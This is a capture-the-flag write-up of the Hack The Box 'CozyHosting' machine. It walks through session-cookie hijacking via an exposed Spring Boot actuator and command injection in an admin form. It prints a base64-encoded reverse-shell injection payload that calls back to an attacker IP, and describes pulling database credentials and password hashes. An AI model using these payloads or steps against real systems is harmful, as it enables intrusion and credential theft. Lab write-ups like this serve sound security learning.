CozyHosting is an easy Hack The Box challenge. In this article, I'll explain my process on how I pwned both the User and System.

Scanning & Enumeration

First, we run nmap to gather more information about our target. The scan shows that a website is hosted on the target.

To visit the website, we need to add its domain name to the hosts file on our machine. This allows our computer to recognize and access the site correctly. After this, we can access the website.

We checked the site and its source code but found nothing useful. To dig deeper, we tried directory scanning. DirBuster and Gobuster were too slow, so we switched to Dirsearch, which quickly found several directories.

One of the directories, /actuator stood out. When visiting it, we got an error, which hinted that the website was built using the Spring Boot framework through a quick Google search.

Most of the /actuator/ endpoints weren’t useful, except for /actuator/sessions, which looked interesting.

Since we had a login page, I checked the cookies and found one. Replacing the cookie with one that belongs to kanderson gave access to the /admin page.

Exploitation

The admin page wasn’t very interesting, except for one form.

We tested different inputs and found that the hostname must be an IP address, so we used 127.0.0.1. For the username field, regular input caused a "Hostkey verification" error, but special characters like & and ; triggered a different error.

This suggested a Command Injection vulnerability, likely in a backend SSH command. We moved to BurpSuite for easier testing and used PayloadAllTheThings to help craft a reverse shell payload. We also used revshells to generate it. To make the payload compatible for sending, we encoded it in base64. The initial payload looked like this:

bash

;c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDEvNDQ0NCAwPiYx|base64 -d;

The semicolons allow multiple commands to run. When we sent it, we got an error due to whitespace issues. We fixed that using $IFS (which represents a space in bash). But it still didn’t , the payload was being interpreted as a command, not a string. So we added echo to treat it as a string:

bash

;echo$IFS"c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDEvNDQ0NCAwPiYx"|base64$IFS-d;

Still no connection, until we added |bash at the end to execute the decoded command:

bash

;echo$IFS"c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDEvNDQ0NCAwPiYx"|base64$IFS-d|bash;

With a netcat listener running, we got a shell.

Lateral Movement

Now that we have shell access, we start looking for anything interesting, especially potential privilege escalation. However, this user cannot run sudo, and running linPEAS didn't reveal anything useful. We also can't access the "josh" user's home directory. But in the /app directory, we find a Java .jar file. To analyze it, we set up a simple HTTP server using Python to download the file to our local machine.

A quick search leads us to a website that can open and decompile .jar files. After decompiling, we explore the contents and find nothing useful until we open a file named application.properties. This file contains PostgreSQL database credentials.

Trying to connect to the database remotely with the psql doesn't work, likely because remote access is disabled. So we connect to the database locally through our reverse shell.

Once connected, we access the "cozyhosting" database and dump the tables. Inside, we find a "users" table. A simple SELECT * shows entries for both the "kanderson" user and an "admin" user.

To move forward, we need to identify and crack the password hashes. Using hashes.com, we identify the hash type as Blowfish. The site also has the plaintext password for the admin user, so we don't need to crack it ourselves.